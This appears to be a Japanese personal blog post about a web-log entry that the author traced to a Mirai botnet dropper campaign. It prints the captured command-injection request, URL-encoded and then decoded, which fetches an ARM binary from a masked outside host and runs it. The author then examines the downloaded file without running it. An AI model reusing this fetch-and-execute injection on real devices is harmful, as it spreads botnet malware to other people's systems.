Mirai-BotnetのDropperを落とそうとするアクセス
Struts2攻撃と思われるものに交じって、こんなのが来てました。
「GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F
%2F%XX%XX%2E%XX%XX%XX%2E%XX%XX%XX%2E%XX%XX%3A%35%34%33
%32%31%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37
%37%20%2A%3B%2E%2F%64%6C%72%2E%61%72%6D HTTP/1.1」
文字列を調べてみたところ「URLデコード」という処理ができそうと分かったので、デコードしてみると…
cd /tmp;wget http://XX.XXX.XXX.XX:54321/dlr.arm;chmod 777 *;./dlr.arm
(IPアドレス部分は伏字にしております)
何か外部からとってくる命令っぽかったので、wgetで「dlr.arm」とやらを取ってきてみました。
マルウェアかなぁと思い、とりあえずFileコマンドで調べると
[tmp]$ file dlr.arm
dlr.arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
何かの実行ファイルっぽい。
さすがに実行はヤバそうなのでエディタで開いてみたら…
Mirai???
GET部分を見てみると、Mirai.armとあるので、Mirai関連の実行ファイルでも落としてくるものなんですかね。
と、悶々としていたところ、某セキュリティ調査機関のメルマガでまったく同じものがレポートとして配信されていました。やっぱりwgetで手に入れたマルウェアはMiraiのDropperだったようです。
そのレポートによると、このアクセスは北アメリカと日本のサーバーを狙った攻撃キャンペーンで、コマンドインジェクションでDropperダウンロードさせて実行・感染⇒Mirai本体ダウンロードして感染⇒Botnet参加となるようです。
ただし感染には「BusyBox」とやらを導入している必要があるらしい。(←これまた良く分からないので、本日はこれまで…)